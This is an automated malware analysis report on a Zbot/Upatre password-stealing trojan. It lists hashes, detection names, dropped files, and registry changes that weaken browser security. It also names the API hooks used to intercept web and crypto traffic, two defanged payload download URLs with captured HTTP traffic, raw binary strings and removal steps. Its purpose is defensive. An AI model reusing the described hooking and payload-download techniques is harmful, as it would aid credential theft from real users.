Trojan-PSW.Win32.Zbot.4_bbae13fd30
Trojan.GenericKD.1559566 (BitDefender), TrojanDownloader:Win32/Upatre.L (Microsoft), Trojan.Win32.Bublik.bxtq (Kaspersky), Trojan.Win32.Upatre.jr (v) (VIPRE), Trojan.DownLoad3.28161 (DrWeb), Trojan.GenericKD.1559566 (B) (Emsisoft), PWSZbot-FRM (McAfee), Downloader.Upatre (Symantec), Trojan-Downloader.Win32.Upatre (Ikarus), Trojan.GenericKD.1559566 (FSecure), Crypt_s.FLK (AVG), Win32:Trojan-gen (Avast), TROJ_UPATRE.SMBX (TrendMicro), Trojan.GenericKD.1559566 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: bbae13fd3099b40b0704e5b341308c1b
SHA1: a52bb7c4c3709e2ef53bf6c4b10935eaf9892e0f
SHA256: 064ec5e33d499b35487ec1384af567e4b88b5bb1c0b60cd2b9c8b344d786b909
SSDeep: 384:uHdZNg Ml2 0fkkzWUHh1DjHXRrs905INeZCFtejlIko5dN127BFVn2p4lAnZ8Oh:Q3NXvkkRfDjHXRrs9sINeZEtejlIkoL7
Size: 20256 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-05 06:01:14
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan-PSW: a Trojan program intended to steal users' passwords.
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
umvaeb.exe:800
%original file name%.exe:160
nomes.exe:392
realupdater.exe:1932
The Trojan-PSW injects its code into the following process(es):
Explorer.EXE:1680
File activity
The process umvaeb.exe:800 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user% (28672 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (17920 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (73728 bytes)
The process %original file name%.exe:160 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\realupdater.exe (20336 bytes)
The process nomes.exe:392 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Xyefq\umvaeb.exe (693248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SWPB639.bat (173 bytes)
%Documents and Settings%\%current user%\Application Data\Xyefq (4096 bytes)
The process realupdater.exe:1932 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nomes.exe (607232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\pdf[1].enc (289558 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\desktop.ini (67 bytes)
Registry activity
The process umvaeb.exe:800 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 6A 3C F9 EE C9 86 33 8A F3 3B 47 09 E6 27 21"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Xyfoleoknam]
"eaijg70" = "CF 79 D5 92 0E 68 7E 28 48 B5 12 54 EC 9C EA 44"
The process %original file name%.exe:160 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 7B 3C 0D F0 E5 BF 68 20 D9 1A E4 E2 6B 49 29"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"realupdater.exe" = "realupdater"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW modifies the IE security-zone settings so that all local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-PSW modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The process nomes.exe:392 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 34 EC E9 9D 67 E6 26 33 76 8A 35 7A 55 CC DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process realupdater.exe:1932 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nomes.exe" = "nomes"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 0C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 22 D4 A1 44 23 CD C6 0B 67 6E 20 61 F5 1F 24"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies the IE security-zone settings so that all local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| bd18016f5cfa5694720ca629ceb148a0 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Xyefq\umvaeb.exe |
| 8a3d521f5dc2f89eb204e9d62b4f67fc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\realupdater.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan-PSW installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan-PSW installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan-PSW installs the following user-mode hooks in Secur32.dll:
DecryptMessage
SealMessage
DeleteSecurityContext
The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan-PSW installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 5980 | 6144 | 4.29621 | 18a409c9ee27ba7e2f52c8d5827db0fb |
| .rdata | 12288 | 1142 | 1536 | 2.80053 | 9921719d3029dea6a7daef99a3f5619c |
| .data | 16384 | 260 | 512 | 1.74846 | 92ed38dfa29b35d2ea9541f9024b641a |
| .rsrc | 20480 | 10232 | 10240 | 3.98165 | 320a63c0552666c12f361d403bd803b5 |
| .reloc | 32768 | 316 | 512 | 2.01653 | 5d5037fb65f960eefa0bdd3de33a413b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://svsmills.com/images/pdf.enc | |
| hxxp://japanrareearths.com/img/pdf.enc | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /img/pdf.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: japanrareearths.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 11 Mar 2014 12:35:43 GMT
Server: Apache
Last-Modified: Thu, 06 Feb 2014 07:36:02 GMT
Accept-Ranges: bytes
Content-Length: 289558
Content-Type: text/plain
ZZP..U8.d.8.>.8.:..p..87>...>.<.'...2.'...8;7".7>.tB..P
.M...L._._.8.].V.Q...\...K...>...q...Qo\...5.....n.8.r.:....|l.oo&g
t;...5.1.>.8.j.=.U.8...;.]...5.8.=.?.>.X.7... k8.1 ;.8.>.<
.....9..o...i..>...?./...].Jo;?`.<.....;...X...M.[.3nu.Cn.q$d ..
...>.8.>.8.......<...I..G8.,.8.^...>Ex.>.X.\.8.^...^...
>yX...O%.okY^...>.X.....>A....8%..8.^.n.>wX..gX.H.8.^.`.&g
t;E~.>.X...8.^...^.2.>.X.0.>...[.d.8.R.X.B.8.^...>[m.>-
X.z.8U^...^...>...7.8.k.8.^.`.>[email protected].^...>Am.>QX...8W
^...^...>...,.8.k.8.^...>.X.`.X.N.8.^...>Om.>]X...6.^.$"^.
6....a^...>E..>QX...8/^...^.N.>?..?...?.E...i.h.8.0.M.>.-.
n.x...n.?.d.?....d....N..K..i.Po).8..... .).>j..>.{.....3.x.^.ms
=>....0.~.g.ed(jc,..>dl.>......G....5d.I?.8...9..-0.>.;.1X
:...^O4..p1X...&3...;G=/:.<.......:m=n;.....'../X....O9k..J.....79?
.?.='.../4...?.>l....<..h....8..VA...........4.*.......k.x.j.(.J
.8.>...6.......q...2d8.:.......z. N..0.,.x.R.$.R.8a>.....;."....
d..*,.........j>..B=6.G.m./>..............G>.<...>..<
;..>'.....o:....'.v.-.......lT.~.9..../9.<.?o....g.:.<.?.f...
8.m.e.o.c.. (...8..3..........6n...Vn....?n.-....p6fE.^....b8.....1X..
....>.\......dx.o.x.L.......>duc.&M...v.1X9...(... ..%3.N.:..o:.
<...>.....m.4....d..s.8d...Y..M.8dn.....6.."..P.. (Yn._.8d.p.8.?
..X...8.I.....:.V7....n....]....N..O.....2....8.h.....j....../......?.
,.v...s.....i.:..m<.79<l8O<l..1j../.u.?.9.......7...9.7..<<< skipped >>>
GET /images/pdf.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: svsmills.com
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Date: Tue, 11 Mar 2014 12:35:46 GMT
Server: Apache
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/pdf.enc was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>
...
.text
`.data
.idata
@.reloc
Invalid parameter passed to C runtime function.
>$>,>4><>
0123456789
http://www.google.com/
http://www.bing.com/
REPORT
HTTP/1.1
RegDeleteKeyExW
gdiplus.dll
GdiplusShutdown
.TJFZAIY]JD^"
?:527|:!;8
!1 (##!(
Kmv`jn`%fnfnzg,bt3crd~da4
1&,$=OJ-:O-
-.ynp<
'2$4>%|903
: 8? 1 !
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
w%fkN
t.Ht$HHt
L$$
m9.td
zcÁ
ntdll.dll
KERNEL32.dll
ExitWindowsEx
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
RegCreateKeyExW
RegCloseKey
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegFlushKey
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
ole32.dll
GDI32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
msvcrt.dll
9 9$9(9,9094989
> >$>(>,>0>4>|>
00D0K0_0q0z0
:!:(:,:1:8:^:
\StringFileInfo\xx\%s
urlmon.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
kernel32.dll
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
shell32.dll
cabinet.dll
Wadvapi32.dll
"%s" %s
/c "%s"
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{6D2DABD3-6C4A-40B1-99CD-5691B9DB7583}
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
umvaeb.exe:800
%original file name%.exe:160
nomes.exe:392
realupdater.exe:1932
- Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%Documents and Settings%\%current user% (28672 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (17920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\realupdater.exe (20336 bytes)
%Documents and Settings%\%current user%\Application Data\Xyefq\umvaeb.exe (693248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SWPB639.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nomes.exe (607232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\pdf[1].enc (289558 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\desktop.ini (67 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.